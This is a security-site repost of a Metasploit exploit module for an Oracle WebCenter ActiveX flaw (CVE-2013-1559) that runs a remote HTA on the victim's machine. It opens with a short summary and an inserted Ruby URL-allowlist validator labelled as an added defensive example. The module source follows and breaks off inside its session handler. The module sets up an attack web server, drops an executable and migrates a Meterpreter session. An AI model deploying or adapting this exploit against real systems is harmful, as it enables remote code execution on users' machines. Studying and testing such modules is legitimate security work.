
Oracle WebCenter CheckOutAndOpen.dll ActiveX Remote Code Execution

Date: 2013-06-03 19:14 Source: unknown Author: www.secye.com

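This Metasploit module exploits a vulnerability in the CheckOutAndOpenControl ActiveX control of Oracle WebCenter Content. The vulnerability exists in openWebdav(), where user-controlled input is used to call ShellExecuteExW(). The module abuses the control to execute an arbitrary HTA from a remote location. It has been tested successfully against the CheckOutAndOpenControl ActiveX installed with Oracle WebCenter Content 11.1.1.6.0.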
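The root cause described above is user-controlled input reaching ShellExecuteExW() without validation. The following Ruby is an added example (not code from the original page, from Oracle, or from the Metasploit module) of the allowlist check a component should apply before handing a document URL to an OS "open" call. The function name, host name, scheme list and extension list are constructed assumptions.

```ruby
require 'uri'

# Constructed policy values for illustration (assumptions, not from the page).
ALLOWED_SCHEMES    = %w[http https].freeze
ALLOWED_HOSTS      = %w[webcenter.example.internal].freeze
ALLOWED_EXTENSIONS = %w[.doc .docx .xls .xlsx .ppt .pptx .pdf .txt].freeze

# Hypothetical helper: returns [true, nil] when the target may be opened,
# or [false, reason] when it must be rejected before any shell-execute call.
def check_open_target(raw)
  return [false, 'empty or non-string input'] unless raw.is_a?(String) && !raw.strip.empty?
  # Backslashes indicate UNC or local Windows paths, never a WebDAV URL.
  return [false, 'backslash or UNC path'] if raw.include?('\\')
  return [false, 'control character'] if raw =~ /[\x00-\x1f]/

  uri = URI.parse(raw)
  return [false, 'scheme not allowed'] unless ALLOWED_SCHEMES.include?(uri.scheme.to_s.downcase)
  return [false, 'embedded credentials'] if uri.userinfo
  return [false, 'host not allowed'] unless ALLOWED_HOSTS.include?(uri.host.to_s.downcase)

  # Decide on the percent-decoded path so "%2Ehta" cannot hide the file type.
  path = URI.decode_www_form_component(uri.path.to_s)
  ext  = File.extname(path).downcase
  return [false, "extension #{ext.inspect} not allowed"] unless ALLOWED_EXTENSIONS.include?(ext)

  [true, nil]
rescue URI::InvalidURIError, ArgumentError
  [false, 'unparseable URL']
end
```

The check is an allowlist on scheme, host and extension, so executable content types such as HTA are rejected by default rather than by name.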

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
      'Description'    => %q{
          This module exploits a vulnerability found in the Oracle WebCenter Content
        CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where
        user controlled input is used to call ShellExecuteExW(). This module abuses the
        control to execute an arbitrary HTA from a remote location. This module has been
        tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle
        WebCenter Content 11.1.1.6.0.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1559' ],
          [ 'OSVDB', '92386' ],
          [ 'BID', '59122' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f -k'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 16 2013",
      'DefaultTarget'  => 0))
  end

  def exploit
    @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
    @dropped_files = [
      @var_exename
    ]
    super
  end

  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")

Article source: SecYe Security [http://www.secye.com] (Editor: SecYe Security)
